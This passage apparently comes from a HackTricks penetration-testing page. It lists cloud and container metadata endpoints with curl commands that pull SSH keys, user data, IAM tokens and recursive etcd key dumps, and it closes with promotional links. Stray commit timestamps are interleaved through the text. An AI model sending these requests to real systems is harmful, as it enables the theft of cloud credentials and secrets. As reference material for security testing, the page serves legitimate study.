curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
# Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
# Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq
# Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
```
{% endcode %}
## Packetcloud <a href="#2af0" id="2af0"></a>
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
2022-05-02 18:53:13 +00:00
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
2022-02-13 12:30:13 +00:00
(header required? unknown)
```
http://169.254.169.254/openstack
```
2022-05-02 18:53:13 +00:00
## HP Helion <a href="#a8e0" id="a8e0"></a>
2022-02-13 12:30:13 +00:00
(header required? unknown)
```
http://169.254.169.254/2009-04-04/meta-data/
```
2022-05-02 18:53:13 +00:00
## Oracle Cloud <a href="#a723" id="a723"></a>
2022-02-13 12:30:13 +00:00
```
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
2022-05-02 18:53:13 +00:00
## Alibaba <a href="#51bd" id="51bd"></a>
2022-02-13 12:30:13 +00:00
```
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
2022-05-02 18:53:13 +00:00
## Kubernetes ETCD <a href="#c80a" id="c80a"></a>
2022-02-13 12:30:13 +00:00
Can contain API keys and internal ip and ports
```
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
2022-05-02 18:53:13 +00:00
## Docker <a href="#ac0b" id="ac0b"></a>
2022-02-13 12:30:13 +00:00
```
http://127.0.0.1:2375/v1.24/containers/jsonSimple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
2022-05-02 18:53:13 +00:00
## Rancher <a href="#8cb7" id="8cb7"></a>
2022-02-13 12:30:13 +00:00
```
curl http://rancher-metadata/<version>/<path>
```
2022-04-28 16:01:33 +00:00
2023-09-02 23:51:32 +00:00
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
2023-09-02 23:48:41 +00:00
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
2022-04-28 16:01:33 +00:00
<details>
2024-01-01 17:15:10 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-01-01 17:15:10 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-09-25 14:14:17 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2024-01-01 17:15:10 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>